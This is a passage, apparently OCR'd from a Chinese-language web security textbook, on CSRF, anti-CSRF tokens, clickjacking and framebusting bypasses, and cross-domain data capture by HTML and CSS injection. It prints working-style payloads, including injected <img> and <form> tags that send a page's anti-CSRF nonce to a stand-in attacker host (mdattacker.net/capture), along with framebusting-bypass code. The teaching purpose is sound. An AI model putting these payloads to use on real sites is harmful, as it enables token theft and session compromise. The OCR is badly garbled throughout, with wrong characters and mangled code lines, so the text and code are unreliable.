件 的 应 用 程序 为 例 。 这 些 文件 随后 可 以 进行 下 载 ， 但 只 能 由 上 传 它 们 
的 用 户 下 载 。 假 设 由 于 没有 对 文件 内 容 进行 过 滤 ， 该 功能 可 用 于 实施 
保存 型 XSS 攻 击 (请 参阅 第 12 章 了 解 相 关内 容 ) 。 该 漏洞 似乎 并 不 会 
造成 任何 伤害 ， 因 为 攻击 者 只 能 用 它 来 攻击 自己 。 但 实际 上 ， 通 过 使 
用 CSRF 技 巧 ， 攻 击 者 可 以 利用 保存 型 XSS 漏 洞 来 攻破 其 他 用 户 。 如 上 
文 所 述 ， 攻 击 者 的 网 页 可 以 提出 一 个 CSRE 请 求 ， 强 制 受害 用 户 使 用 攻 
击 者 的 证 书 登 录 。 然 后 ， 攻 击 者 的 网 页 可 以 提出 另 一 个 CSRF 请 求 ， 以 
下 载 某 个 恶意 文件 。 用 户 的 浏览 器 处 理 该 文件 时 ， 攻 击 者 的 XSS 有 效 
载 何 将 会 执行 ， 用 户 在 易 受 攻击 的 应 用 程序 中 的 会 话 将 被 攻破 。 虽 然 
受害 者 当前 是 使 用 攻击 者 的 账户 登录 的 ， 但 是 ， 攻 击 并 未 就 此 结束 。 
如 第 12 章 所 述 ，XSS 有 效 载 集 可 以 在 用 户 的 浏览 器 中 持续 存在 ， 并 执 
行 任 意 操 作 ， 因 而 可 以 让 用 户 注销 其 在 易 受 攻击 的 应 用 程序 中 的 会 
话 ， 并 诱 使 其 使 用 自己 的 证 书 登录 。 

e 防止 CSRF 漏 洞 

由 于 浏览 器 上 自动 在 随后 的 每 个 请 求 中 将 cookie 返 回 给 发 布 cookie 的 
Web 服 务 器 ，CSRF 漏 洞 因此 产生 。 如 果 某 个 web 应 用 程序 主要 依赖 
HTTP cookie 传 送 会 话 令 牌 ， 那 么 它 本 身 就 易于 受到 这 种 攻击 。 


防范 CSRF 攻 击 的 标准 方法 ， 是 将 HTTP cookie 与 其 他 追踪 令 牌 的 
方法 相 结 合 。 这 类 方法 通常 采用 其 他 通过 HTTP 隐 藏 表单 字段 传输 的 令 
牌 。 在 每 次 提交 请 求 时 ， 应 用 程序 除 确认 会 话 cookie 外 ， 还 核实 表单 
是 否 传送 了 正确 的 令 牌 。 如 果 攻 击 者 无 法 确定 该 令 牌 的 值 ， 就 无 法 构 
建 跨 域 请 求 ， 也 就 无 法 执行 所 需 的 操作 。 


人 注解 ”本 章 后 面部 分 将 介绍 ， 即 使 使 用 CSRF 令 牌 受到 可 千 


保护 的 功能 也 可 能 易于 受到 用 户 界面 (UL) 伪装 攻击 。 


以 这 种 方式 使 用 反 CSRF 令 牌 时 ， 必 须 为 这 些 令 牌 提供 与 正常 的 会 
话 令 牌 相同 的 保护 。 如 果 攻 击 者 能 够 预测 发 布 给 其 他 用 户 的 令 牌 值 ， 
他 就 能 够 确定 提出 CSREF 请 求 所 需 的 所 有 参数 ， 因 而 仍然 能 够 实施 攻 
击 。 此 外 ， 如 果 反 CSRF 令 牌 末 与 所 属 用 户 的 会 话 相 关联 ， 攻 击 者 就 可 
以 在 自己 的 会 话 中 获得 一 个 有 效 令 和 脾 ， 并 将 此 令 牌 用 在 针对 其 他 用 户 
的 会 话 的 CSRF 攻 击 中 。 


尝试 访问 


http://mdsec.net/auth/395/ 
http://mdsec.net/auth/404/ 


人 人 警告 一 些 应 用 程序 使 用 相对 较 短 的 反 CSRF 令 牌 ， 可 


能 因为 认为 这 些 令 牌 不 会 像 较 短 的 会 话 令 牌 一 样 受到 蛮 力 攻击 。 任 
何 癌 应 用 程序 传送 大 量 可 能 值 的 攻击 都 需要 通过 受害 者 的 浏 唤 器 传 
送 这 些 值 ， 包 括 提 交大 量 可 能 被 轻易 察觉 的 请 求 。 此 外 ， 如 采 收 到 
太 多 无 效 的 反 CSRF 令 牌 ， 应 用 程序 可 能 会 防御 性 地 终止 用 户 的 会 
话 ， 从 而 阻止 相关 攻击 。 但 是 ， 这 种 防御 忽略 了 纯粹 在 客户 端 实施 
的 蛋 力 攻击 ， 而 不 同 服 务 絮 发 送 任 何 请 求 的 可 能 性 。 在 某 些 情况 
下 ， 可 以 通过 使 用 基于 CSS 的 技巧 来 枚 举 用 户 的 浏览 历史 记录 ， 从 
人 。 要 想 成 功 实施 这 类 攻击 ， 必 须 满足 以 下 两 个 条 


口 应 用 程序 必须 某 些 时 候 在 URL 查 询 字 符 串 中 传输 CSRE 令 牌 。 
这 种 情况 经 常 发 生 ， 因 为 许多 受 保 护 的 功能 通过 目标 URL 中 包含 令 
牌 的 简单 超 链接 即 可 访问 。 

口 应 用 程序 必须 在 整个 用 户 会 话 中 使 用 相同 的 反 CSRF 令 有 牧 ， 或 
者 允许 多 次 使 用 同一 个 令 牌 。 这 种 情况 也 经 常 发 生 ， 一 方面 是 为 了 
改善 用 户 的 使 用 体验 ， 男 一 方面 是 为 了 便于 使 用 浏览 器 的 “后 
退 " 和 “< 前进” 按钮 。 

如 有 果 满 足 这 些 条件 ， 并 且 目 标 用 户 已 访问 某 个 包含 反 CSRF 倒 
牌 的 URL， 攻 击 者 茂 可 以 从 目 己 的 页 面 实施 蛮 力 攻击 。 这 时 ， 攻 击 
者 页 面 上 的 一 段 脚 本 将 动态 创建 指 癌 目标 应 用 程序 上 的 相关 UREL 的 
超 链接 ， 同 时 在 每 个 链接 中 包括 一 个 不 同 的 反 CSREF 令 牌 值 。 然 
后 ， 该 脚本 使 用 JavaScript API getComputedStyle 测 试用 户 是 否 访问 
了 上 上述 链接 。 确 定 某 个 被 访问 的 链接 后 ， 即 可 发 现 一 个 有 效 的 反 
然后 ， 攻 击 者 的 页 面 将 其 用 于 代表 用 户 执行 敏感 操 


需要 注意 的 是 ， 要 防范 CSRF 攻 击 ， 仪 仅 使 用 多 阶段 过 程 执行 敏感 
操作 并 不 够 。 例 如 ， 管 理 员 在 添加 新 用 户 账户 时 ， 他 可 能 会 在 第 一 阶 
段 输入 相关 信息 ， 然 后 在 第 二 阶段 检查 并 确认 这 些 信息 。 如 果 示 使 用 
其 他 反 CSRF 令 脾 ， 该 功能 将 仍然 易于 受到 CSRF 攻 击 ， 因 为 攻击 者 只 
a 或 者 直接 提交 第 二 个 请 求 (极为 常 
Ig 

少数 情况 下 ， 应 用 程序 功能 会 采用 为 一 个 令 牌 ， 它 在 一 个 啊 应 中 
设置 该 令 牌 ， 然 后 在 接 下 来 的 请 求 中 所 区 该 令 牌 。 但 是 ， 在 这 两 个 阶 
段 之 间 转 换 需要 进行 重 定向 ， 因 此 应 用 程序 采用 的 防御 机 制 可 能 会 失 
效 。 虽 然 CSRF 属 于 单 回 攻击 ， 并 且 无 法 从 应 用 程序 的 啊 应 中 读 取 令 
牌 ， 但 如 采 CSRF 啊 应 包含 重 定 同 ， 而 且 该 重 定 回 指 癌 其 他 包含 令 牌 的 
URL， 受 害 者 的 浏览 万 将 目 动 访问 该 重 定 同 ， 并 有 目 动 在 提出 的 请 求 中 


提交 令 牌 。 


尝试 访问 


http://mdsec.net/auth/398/ 


不 要 犯 下 错误 ， 依 靠 HITP Referer 消 息 头 来 指示 请 求 是 源 自 站 内 
还 是 站 外 。Referer 消 息 头 可 以 使 用 旧版 Flash 进 行 修改 ， 或 用 元 刷新 标 
签 (meta refresh tag) 来 伪装 。 通 常 而 言 ， 使 用 Referer 消 息 头 并 不 能 为 
Web 应 用 程序 提供 强大 的 安全 防御 。 

@ 通过 XSS 突 破 反 CSRF 防 御 

人 们 常 称 ， 如 果 应 用 程序 中 包含 任何 XSS 漏 洞 ， 那 么 反 CSRF 防 御 
机 制 就 可 以 被 突破 。 这 种 说 法 并 不 完全 正确 。 但 是 ， 文 持 这 种 观点 的 
思考 方法 是 正确 的 ， 因 为 XSS 有 效 载荷 在 本 站 执行 ， 可 以 与 应 用 程序 
进行 双向 交互 ， 所 以 它们 能 够 从 应 用 程序 的 响应 中 获取 令 牌 ， 并 在 随 
后 的 请 求 中 提交 这 些 令 牌 。 

然而 ， 如 果 某 个 本 身受 到 反 CSRF 防 御 机 制 保护 的 页 面 也 包含 反射 
型 XSS 漏 洞 ， 那 么 这 种 漏洞 并 不 能 直接 用 于 突破 防御 。 记 住 ， 在 反射 
型 XSS 攻 击 中 ， 最 初 的 请 求 为 跨 站 点 请 求 。 这 时 ， 攻 击 者 会 设计 一 个 
URIL 或 一 个 POST 请 求 ， 其 中 包含 随后 被 复制 到 应 用 程序 的 响应 中 的 恶 
意 输 入 。 但 是 ， 如 果 易 受 攻 击 的 页 面 实施 了 反 CSRF 防 御 ， 那 么 攻击 者 
要 想 实施 有 效 攻击 ， 其 专门 设计 的 请 求 中 必须 已 经 包含 必要 的 令 牌 。 
如 果 其 中 没有 所 需 令 牌 ， 应 用 程序 将 会 拒绝 攻击 者 提出 的 请 求 ， 同 时 
包含 反射 型 XSS 漏 洞 的 代码 路 径 也 不 会 执行 。 这 时 ， 问 题 并 不 在 于 注 
入 的 脚本 是 否 能 够 读 取 应 用 程序 响应 中 的 任何 令 牌 (当然 它 能 ) ， 而 
在 于 如 何 首 先 将 脚本 注入 到 某 个 包含 那些 令 牌 的 响应 中 。 

通常 ， 在 下 面 几 种 情况 下 ， 我 们 可 以 利用 XSS 漏 洞 突破 反 CSRF 防 


口 如 果 受 保护 的 功能 中 存在 任何 XSS 漏 洞 ， 那 么 攻击 者 总 可 以 利 
用 这 些 漏洞 突破 反 CSRF 防 御 。 通 过 保存 型 攻击 注入 的 JavaScript 可 直 
接 读 取 脚 本 所 在 的 应 用 程序 啊 应 中 的 令 牌 。 


御 


口 如 果 应 用 程序 仅 对 一 部 分 通过 验证 的 功能 实施 反 CSREF 防 御 ， 并 
且 某 项 未 防御 CSRE 的 功能 中 存在 一 个 反射 型 XSS 漏 洞 ， 那 么 攻击 者 就 
可 以 利用 这 个 漏洞 来 突破 反 CSRF 防 御 。 例 如 ， 如 果 应 用 程序 仅 采 用 反 
CSREF 令 牌 保护 转账 功能 的 第 二 个 步骤 ， 那 么 攻击 者 了 加 可 以 利用 反射 型 
XSS 攻 击 从 其 他 步骤 中 突破 防御 。 通 过 这 个 漏洞 注入 的 一 段 脚本 可 以 
向 第 一 个 转账 步骤 提出 一 个 站 内 请 求 ， 截 取 令 牌 ， 然 后 使 用 这 个 令 牌 
进入 第 二 个 步骤 。 攻 击 之 所 以 能 够 成 功 ， 是 因为 第 一 个 没有 采取 CSREF 
防御 的 转账 步骤 返回 了 访问 受 保护 页 面 所 需 的 令 牌 。 仅 依赖 HTTP 
cookie 实 现 第 一 个 步 又， 意味 着 攻击 者 可 以 利用 它 访 问 保护 第 二 个 步 
又 的 令 牌 ， 从 而 实施 有 效 攻 击 。 

口 在 某 些 应 用 程序 中 ， 反 CSREF 令 牌 仅 与 当前 用 户 相 关联 ， 而 不 是 
与 用 户 的 会 话 相关 联 。 在 这 种 情况 下 ， 如 果 登 录 表 单 未 防范 CSRF 攻 
击 ， 则 应 用 程序 仍 有 可 能 受到 多 阶段 攻击 。 首 先 ， 攻 击 者 使 用 目 己 的 
账户 登录 ， 获 得 一 个 与 他 的 用 户 身 份 关联 的 有 效 反 CSRF 令 牌 。 然 后 ， 
攻击 者 对 登录 表单 发 动 CSRF 攻 击 ， 迫 使 受害 用 户 使 用 他 的 证 书 登 录 ， 
如 上 文 介绍 利用 相同 用 户 的 保存 型 XSS 漏 洞 时 所 述 。 一 旦 用 户 作 为 攻 
击 者 登录 ， 攻 击 者 将 使 用 CSRF 使 用 户 提 出 相关 请 求 ， 对 XSS 漏 洞 加 以 
利用 ， 同 时 使 用 他 此 前 获得 的 反 CSRE 令 牌 。 然 后 ， 攻 击 者 的 XSS 有 效 
载 何 将 在 用 户 的 浏览 器 中 执行 。 由 于 用 户 仍 然 作为 攻击 者 登录 ，XSS 
有 效 载 集 可 能 需要 使 用 户 注销 ， 然 后 诱 使 用 户 再 次 登录 ， 最 终 ， 用 户 
的 登录 证 书 和 生成 的 应 用 程序 会 话 都 被 完全 攻破 。 

口 如 果 反 CSRF 令 牌 末 与 用 户 关 联 ， 而 是 与 当前 会 话 关联 ， 且 攻击 
者 可 以 通过 某 种 方法 在 用 户 的 浏览 器 中 注入 cookie， 则 只 需 对 以 上 攻 
击 稍 作 修 改 即 可 〈 本 章 后 面部 分 将 介绍 这 种 攻击 ) 。 这 时 ， 攻 击 者 不 
是 使 用 自己 的 证 书 针对 登录 表单 实施 CSRF 攻 击 ， 而 可 以 直接 向 用 户 传 
送 他 当前 的 会 话 令 牌 及 与 该 会 话 关联 的 反 CSRF 令 牌 。 然 后 ， 该 攻击 的 
剩余 部 分 与 之 前 所 述 的 步骤 相同 。 

除 这 些 情形 外 ， 在 许多 时 候 ， 针 对 CSRF 攻 击 的 有 效 防御 能 够 在 很 
大 程度 上 阻止 〈 即 使 不 能 完全 阻止 ) 攻击 者 利用 某 些 反射 型 XSS 漏 
洞 。 但 是 ， 在 任何 情况 下 ， 无 论 我 们 采取 了 何 种 反 CSREF 防 御 来 阻止 攻 
击 者 试图 利用 XSS 条 件 ， 我 们 都 应 始终 修复 应 用 程序 中 存在 的 任何 这 
类 XSS 条 件 。 


13.1.2 UI 伪装 


基本 上 ， 与 页 面 中 的 令 牌 有 关 的 反 CSRF 防 御 旨 在 确保 请 求 是 由 应 
用 程序 中 的 用 户 操作 本 身 提出 的 ， 而 不 是 由 某 个 第 三 方 域 诱发 的 。 即 
使 采用 了 反 CSRF 令 牌 ， 第 三 方 站 扩 仍 然 可 以 通过 UI 仿效 攻击 诱 使 其 他 
域 中 的 用 户 执行 操作 。 在 某 种 程度 上 ， 这 类 攻击 之 所 以 能 够 成 功 ， 是 
因为 生成 的 请 求实 际 上 来 自 攻 击 者 针对 的 应 用 程序 。UI 念 装 技巧 通常 
ERK AEE” (clickjacking) 、“ 键 击 动 持 ” (strokejacking) 等 其 
他 常见 说 法 。 

基本 上 ， 在 UI 仿效 攻击 中 ， 攻 击 者 的 网 页 会 将 目标 应 用 程序 加 载 
到 其 页 面 上 的 iframe 中 。 而 实际 上 上， 攻击 者 会 用 其 他 界面 履 盖 目标 应 
用 程序 的 界面 。 攻 击 者 的 界面 中 包含 吸引 用 户 并 诱 使 其 执行 各 种 操作 

(如 在 页 面 的 特定 区 域 单 击 鼠标 ) 的 内 容 。 用 户 执 行 这 些 操作 时 ， 虽 
然 看 起 来 其 单 击 的 是 攻击 者 的 界面 中 显示 的 按钮 和 其 他 UI 元 素 ， 但 他 
实际 上 是 在 不 知情 的 情况 下 与 攻击 者 所 针对 的 应 用 程序 进行 交互 。 

以 一 个 分 两 步 进行 转账 的 银行 功能 为 例 。 在 第 一 步 中 ， 用 户 提交 
转账 信息 。 对 此 请 求 的 啊 应 将 显示 这 些 信 息 ， 以 及 一 个 用 于 确认 该 操 
作 并 进行 转账 的 按钮 。 此 外 ， 为 防止 CSRF 攻 击 ， 啊 应 中 的 表单 还 包含 
一 个 隐藏 字段 ， 其 中 提供 了 一 个 无 法 预测 的 令 牌 。 此 令 牌 在 用 户 单 
击 “ 确 认 ? 时 提交 ， 应 用 程序 将 在 转账 之 前 验证 它 的 值 。 

在 UI 伪 装 攻击 中 ， 攻 击 者 的 页 面 在 此 过 程 中 使 用 传统 的 CSRF 提 区 
第 一 个 请 求 。 提 交 过 程 在 攻击 者 页 面 内 的 iframe 中 完成 。 和 正常 情况 
下 一 样 ， 应 用 程序 会 作出 响应 ， 返 回 要 添加 的 用 户 的 详细 信息 ， 以 及 
一 个 用 于 确认 该 操作 的 按钮 。 此 啊 应 将 在 攻击 者 的 iframe 中 “显示 ”， 该 
iframe 已 由 攻击 者 的 界面 禾 盖 ， 该 界面 旨 在 诱 使 受害 用 户 单 击 包 仿 “ 确 
认 ” 按 钮 的 区 域 。 如 采用 户 在 此 区 域 单 击 ， 他 将 在 不 知情 的 情况 下 单 击 
从 而 创建 新 用 户 。 这 种 基本 的 攻击 如 
4113-17 ° 


© Win big! 


>i CG x} 
6 2 | http//mdattacker.net/ pr 3X 


Win big!! 


Confirm funds transfer om 
人 t 


图 13-1 ”基本 的 UI 伪装 攻击 


这 种 攻击 之 所 以 能 够 在 纯粹 的 CSRF 攻 击 无 法 奏效 的 情况 下 取得 成 
功 ， 是 因为 应 用 程序 使 用 的 反 CSRF 令 有 牌 以 正常 方式 得 到 处 理 。 虽 然 由 
于 同 源 策 略 的 原因 ， 攻 击 者 的 页 面 无 法 读 取 该 令 牌 的 值 ， 但 攻击 者 的 
iframe 中 的 表单 包含 了 由 应 用 程序 生成 的 令 牌 ， 在 受害 用 户 不 知情 的 
情况 下 单 击 “ 确 认 ” 按 钮 和 时， 这 个 令 牌 被 返 交 给 应 用 程序 。 在 目标 应 用 
程序 看 来 ， 一 切 都 很 正常 。 

要 实施 欺 骄 ， 即 让 受害 用 户 虽 然 看 到 一 个 界面 ， 但 实际 上 却 与 男 
一 个 界面 交互 ， 攻 击 者 可 以 采用 各 种 CSS 技 术 。 加 载 目标 应 用 程序 的 
iframe 可 以 为 任意 大 小 ， 位 于 攻击 者 页 面 中 的 任何 位 置 ， 并 显示 目标 
页 面 的 任意 位 置 。 使 用 适当 的 样式 属性 ， 可 以 令 该 iframe 变 得 完全 透 
明 ， 从 而 使 其 对 用 户 不 可 见 。 
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如 果 进 一 步 扩 展 上 述 基 本 攻击 ， 攻 击 者 可 以 在 其 界面 中 使 用 复杂 
的 脚本 代码 ， 以 诱 使 受害 用 户 执行 更 加 复 洒 的 操作 ， 而 不 仅仅 是 单 击 
按钮 。 比 方 说 ， 要 实施 攻击 ， 需 要 诱 使 用 户 在 输入 字段 (如 转账 页 面 
的 “金额 ”字段 ) 中 输入 一 些 文本 。 在 这 种 情况 下 ， 攻 击 者 可 以 在 其 用 
户 界 面 中 包含 一 些 诱 使 用 户 输入 文本 的 内 容 ， 如 用 于 输入 电话 号 码 以 
万 得 奖励 的 表单 。 然 后 ， 攻 击 者 的 页 面 中 的 脚本 可 以 对 进行 键 击 选择 
性 处 理 ， 在 用 户 输入 相关 字符 时 ， 将 键 击 操作 有 效 传递 到 目标 界面 ， 
从 而 填写 所 需 的 输入 字段 。 如 果 用 户 输入 攻击 者 不 布 望 在 目标 界面 中 
输入 的 字符 ， 该 键 击 将 不 会 传递 给 目标 界面 ， 攻 击 者 的 脚本 将 等 待 下 
一 次 键 击 。 

另外 ， 攻 击 者 的 页 面 中 可 以 包含 诱 使 用 户 执行 拖 动 纪 标 操作 (就 
像 玩 简 单 的 游戏 一 样 ) 的 内 容 。 随 后 ， 在 攻击 者 的 页 面 中 运行 的 脚本 
将 选择 性 地 处 理 生成 的 操作 ， 使 用 户 在 不 知情 的 情况 下 选择 目标 应 用 
程序 界面 中 的 文本 ， 并 将 其 拖 动 到 攻击 者 的 界面 中 的 输入 字段 中 (或 
相反 ) 。 例 如 ， 在 针对 Web 邮 件 应 用 程序 实施 攻击 时 ， 攻 击 者 可 以 诱 
使 用 户 将 电子 邮件 中 的 文本 拖 动 到 其 能 够 读 取 的 输入 字段 中 。 或 者 ， 
攻击 者 可 以 诱 使 用 户 建 立 某 种 规则 ， 疝 某 转 发 所 有 电子 邮件 ， 并 将 所 
需 电 子 邮 件 地 址 从 攻击 者 的 界面 拖 动 到 定义 该 规则 的 表单 的 相关 输入 
字段 中 。 此 外 ， 由 于 链接 和 图 像 均 可 以 作为 URL 进 行 拖 动 ， 攻 击 者 其 
至 可 以 通过 诱发 拖 动 操作 从 日 标 应 用 程序 的 界面 中 拦截 敏感 URL， 包 
括 反 CSRF 令 牌 。 

Oe 
下 文档 : 

http://ui-redressing.mniemietz.de/uiRedressing.pdf 
1.“ 破 坏 框 架 ” 防 御 

在 UI 伪 装 攻 击 最 初 受 到 广泛 关注 时 ， 许 多 知名 的 Web 应 用 程序 寻 
求 采用 一 种 称 为 破坏 框架 (framebusting) 的 技术 来 防范 这 类 攻击 。 在 
某 些 情况 下 ， 这 种 技术 已 用 于 防范 其 他 基于 框架 的 攻击 。 


破坏 框架 可 以 表现 为 各 种 形式 ,但 基本 上 ， 它 是 指 每 个 相关 的 应 
用 程序 页 面 都 会 运行 一 段 脚本 来 检测 目 己 古 否 被 加 载 到 iframe 中 。 如 
果 是 ， 应 用 程序 会 尝试 “破坏 ”该 iframe， 或 执行 其 他 防御 性 操作 ， 如 重 
定 问 到 错误 页 面 或 拒绝 显示 应 用 程序 目 己 的 界面 。 

斯 坦 福 大 学 2010 年 的 一 项 研究 表明 ， 排 名 前 500 的 网 站 均 采 用 
了 “破坏 框架 ”防御 技术 。 同 时 ， 这 项 研究 还 发 现 ， 这 些 防御 都 可 以 通 
过 某 种 方式 突破 。 突 破 这 种 防御 的 方法 因 每 种 防御 的 实施 细节 而 异 ， 
下 面 我 们 通过 一 段 “ 破 坏 框 染 ” 示 例 代 码 来 加 以 说 明 : 


<script> 
1f (top.location != self.location) 
{ top.location = self.location } 
</script> 


这 上段 代码 检查 页 面 本 身 的 URL 与 浏览 器 窗口 中 的 顶部 框架 的 
URL 是 否 匹 配 。 如 果 不 匹 配 ， 则 说 明 页 面 已 加 载 到 子 框 染 内 。 在 
这 种 情况 下 ， 脚 本 会 尝试 将 页 面 重 狐 加 载 到 窗口 内 的 顶层 框 染 
中 ， 从 而 “逃离 ”该 框架 。 
实施 UI 伪装 攻击 的 攻击 者 可 以 通过 各 种 方式 避 开 这 种 防御 ， 将 目标 页 
面 成 功 散 入 框架 。 
o 由 于 攻击 者 的 页 面 控制 着 顶层 框架 ， 因 而 可 以 重新 定义 
top.location 的 含义 ， 在 子 框 以 演 试 引用 它 时 导致 异常 。 例 如 ， 攻 击 者 
可 以 在 Internet Explorer 中 运行 以 下 代码 : 


var location = "fog: 


这 段 代 码 将 location 重 新 定义 为 顶层 框架 中 的 本 地 变量 ， 
在 子 框架 中 运行 的 代码 无 法 访问 该 变量 。 

口 顶层 框架 可 能 会 钧 集 window.onbeforeunload 事 件 ， 从 而 在 “破坏 
框架 ”代码 尝试 设置 顶层 框架 的 位 置 时 运行 攻击 者 的 事件 处 理 程序 。 这 
时 ， 攻 击 者 的 代码 可 以 对 返回 HTTP 204 (无 内 容 ) 响应 的 URL 执 行进 
一 步 的 重 定 癌 。 这 会 导致 浏览 万 取 消 重 定 回 调用 链 ， 使 项 层 框 以 的 
URL 保 持 不 变 。 

口 顶层 框架 可 以 在 将 目标 应 用 程序 加 载 到 子 框架 中 时 定义 sandbox 
属性 。 这 会 在 子 框架 中 茜 用 脚本 ， 同 时 将 其 cookie 保 持 为 局 用 状态 。 


口 如 第 12 章 所 述 ， 顶 层 框 染 可 以 利用 I 斑 XSS 过 滤 如 在 子 框架 中 选 
择 性 的 禁用 “破坏 框架 * 脚 本 。 当 攻击 者 的 页 面 指 定 iframe 目 标的 URL 
上 时， 可 以 创建 一 个 新 参数 ， 在 参数 值 中 包含 一 段 适当 的 “破坏 框架 * 脚 
本 。IE XSS 过 滤 回 将 标识 该 参数 值 及 目标 应 用 程序 返回 的 响应 中 的 脚 
本 代码 ， 并 禁用 响应 中 的 脚本 ， 设 法 为 用 户 提供 保护 。 


尝试 访问 
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2. 防止 UI 伪装 

BR, WAHU, 虽然 一 些 类 型 的 “破坏 框架 ”代码 可 以 在 一 
定 程 度 上 阻 让 UI 伪装 攻击 ， 但 绝 不 能 将 这 种 技术 作为 防范 UI 伪装 攻击 
WAS ZR ° 
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Vo fem FEO RAE RARER, 
始终 检查 适用 于 移动 设备 的 界面 的 任何 相关 版 本 。 例 如， 虽然 
wahh-app.com/chat/ 能 够 可 靠 地 防范 舱 入 框架 攻击 ， 但 wahh- 
app.com/mobile/chat/ 可 能 并 不 提供 此 类 防御 。 在 设计 反 欣 入 框架 防 


御 时 ， 应 用 程序 开发 者 通常 会 忽略 用 户 界面 的 移动 版 本 ， 这 可 能 是 
因为 他 们 认为 UI 伪装 攻击 无 法 在 移动 设备 上 实施 。 但 是 ， 许 多 情况 
下 ， 在 使 用 标准 ( 非 移 动 ) 浏览 器 访问 上 时， 移动 版 本 的 应 用 程序 仍 
ea 并 且 用 户 会 话 可 以 在 移动 和 非 移 动 版 本 的 应 用 程 
FARE © 


13.2 ”了 跨 域 捕获 数据 


同 源 党 略 旨 在 防止 在 一 个 域 中 运行 的 代码 访问 由 其 他 域 提 供 的 内 
容 。 因 此 ， 跨 站 点 请 求 伪造 攻击 通 向 被 称 为 " 单 癌 攻击。 虽然 一 个 域 
可 以 同 另 一 个 域 提供 请 求 ， 但 它 很 难 读 取 这 些 请 求 的 啊 应 ， 从 而 从 其 
他 域 中 窃取 用 户 数据 。 

实际 上 ， 在 某 些 情况 下 ， 有 各 种 攻击 技巧 可 用 于 从 其 他 域 中 捕获 
整个 或 部 分 啊 应 。 通 单 ， 这 些 攻击 会 对 目标 应 用 程序 肝 方 面 的 功能 
利 见 浏览 右 的 茶 个 功能 加 以 综合 利用 ， 从 而 突破 同 源 策 略 防御 ， 实 现 
器 域 捕获 数据 的 目的 。 


13.2.1 通过 注入 HTML 捕 获 


与 利用 XSS 漏 洞 不 同 ， 攻 击 者 可 以 利用 许多 应 用 程序 提供 的 功 
能 ， 在 其 他 用 户 收 到 的 啊 应 中 注入 一 段 有 限 的 HTML。 例 如 ，Web 邮 
件 应 用 程序 可 能 会 显示 包含 某 个 HTML 标 记 的 电子 邮件 ， 但 会 阻止 可 
用 于 执行 脚本 代码 的 任何 标签 和 属性 。 或 者 ， 动 态 生 成 的 错误 消 轧 可 
能 会 过 滤 一 系列 表达 式 ， 但 仍然 多 许 有 限 使 用 HTML 。 

在 这 些 情况 下 ， 就 可 以 利用 HTML 注 入 条 件 向 攻击 者 所 在 的 域 发 
送 页 面 中 的 敏感 数据 。 例 如 ， 在 Web 邮 件 应 用 程序 中 ， 攻 击 者 或 许可 
以 捕获 私人 电子 邮件 的 内 容 。 或 者 ， 攻 击 者 也 许可 以 读 取 页 面 中 使 用 
a a a 
地 址 。 

以 一 个 允许 攻击 者 在 以 下 啊 应 中 注入 有 限 的 HTML 的 Web 邮 件 应 
用 程序 为 例 : 


[ limited HTML injection here | 


<form action="“http://wahh-mail.com/forwardemail" method="POST"> 


<input type="hidden" name="nonce" value="2230313740821"> 


<input type="submit" value="Forward"> 
</form> 


<script> 
var _StatsTrackerId='AAE78F27CB32i0D'; 


</script> 


在 注入 点 之 后 ， 页 面包 含 了 一 个 提供 CSRF 令 牌 的 HTML 表 单 。 在 
这 种 情况 下 ， 攻 击 者 可 以 在 上 述 啊 应 中 注入 以 下 文本 : 


<img src='http://mdattacker.net/capture?html= 


这 段 HTML 将 打开 一 个 指向 攻击 者 域 中 的 URL 的 图 像 标 签 。 该 
URL 人 包含 在 单 引 号 内 ， 但 URL 字 符 串 并 未 终止 ，<img> 标 签 也 没有 结 
束 。 这 会 导致 浏 贤 絮 将 注入 点 之 后 的 文本 视 为 URL 的 一 部 分 ， 直 到 中 
到 单 引 号 ， 也 就 是 啊 应 中 随后 出 现 引用 的 JavaScript 字 符 串 的 位 置 。 浏 
虎 需 接受 各 种 插入 字符 ， 也 人 允许 URL 跨 越 多 行 。 

用 户 的 浏 顺 壤 处 理 攻 击 者 注入 的 啊 应 时 ， 它 会 尝试 提取 指定 的 
从 而 向 攻击 者 的 域 中 发 送 敏 感 的 反 CSRF 
S hF: 


heep: //mdatracker.net/capture?html=<<formt20action="http: / /wahh-mail.com/ 
forwardemail"%20method="POST"><input$20type="hidden"%20name="nonce"* $20value= 
"2230313740821 "><inputt20tyne="submit "$20va lue="FPorward"*>...</form>... 


<script> vart20_StatsTrackerId= 
男 一 个 攻击 可 以 注入 以 下 文本 : 
<form action="“http://maattacker.net/capture" method="POST"> 


此 攻击 在 应 用 程序 本 身 使 用 的 <form> 标 签 之 前 注入 一 个 指定 攻击 
者 域 的 <form> 标 签 。 在 这 种 情况 下 ， 浏 览 右 在 遇 到 租 入 的 <form> 标 签 
上 时， 它们 将 名 略 该 标签 ， 并 在 过 到 第 一 个 <form> 标 签 的 情况 下 处 理 表 
单 。 因 此 ， 如 果 用 户 提交 表单 ， 表 单 的 所 有 参数 ， 包 括 敏感 的 反 CSRF 
令 脾 ， 将 被 提交 到 攻击 者 的 服务 器 中 : 


POST /capture HTTP/1.1 

Content-Type: application/x-www-form-urlencoded 
Content-Length: 192 

Host: mdattacker.net 


nonce=2230313740821&... 


由 于 上 述 第 二 个 攻击 仅 注 入 了 格式 正常 的 HTML， 因 此 能 够 更 有 
效 地 避 开 那些 旧 在 允许 回 显 的 输入 中 的 HTML 子 集 的 过 滤 。 但 十 这 种 
攻击 也 需要 用 户 干预 ， 在 某 些 情况 下 ， 这 可 能 会 降低 它 的 效率 。 


13.2.2 ”通过 注入 CSS 捕 获 数据 


在 上 一 节 的 示例 中 ， 攻 击 者 需要 在 注入 的 文本 中 使 用 有 限 的 
HTML 标 记 ， 才 能 路 域 捕获 部 分 啊 应 。 但 是 ， 许 多 时 候 ， 应 用 程序 会 
咀 止 或 对 注入 的 输入 中 的 < 和 > 字符 进行 HTML 编 码 ， 防 止 攻击 者 插入 
任何 新 的 HTML 标 签 。Web 应 用 程序 中 大 多 存在 此 类 纯 文本 注入 条 
件 ， 并 且 人 们 通常 认 为 这 种 条 件 不 会 造成 危险 。 

例如 ， 在 一 个 Web 邮 件 应 用 程序 中 ， 攻 击 者 可 以 通过 电子 邮件 主 
题 行 在 目标 用 户 的 啊 应 中 注入 有 限 的 文本 。 在 这 种 情况 下 ， 攻 击 者 可 
以 通过 在 应 用 程序 中 注入 CSS 来 跨 域 捕获 敏感 数据 。 

在 上 述 示例 中 ， 假 设 攻击 者 发 送 市 以 下 主题 行 的 电子 邮件 : 


{}*{font-family: ' 


由 于 其 中 不 包含 任何 HTML 元 字符 ， 大 多 数 用 户 都 接受 并 在 收 件 
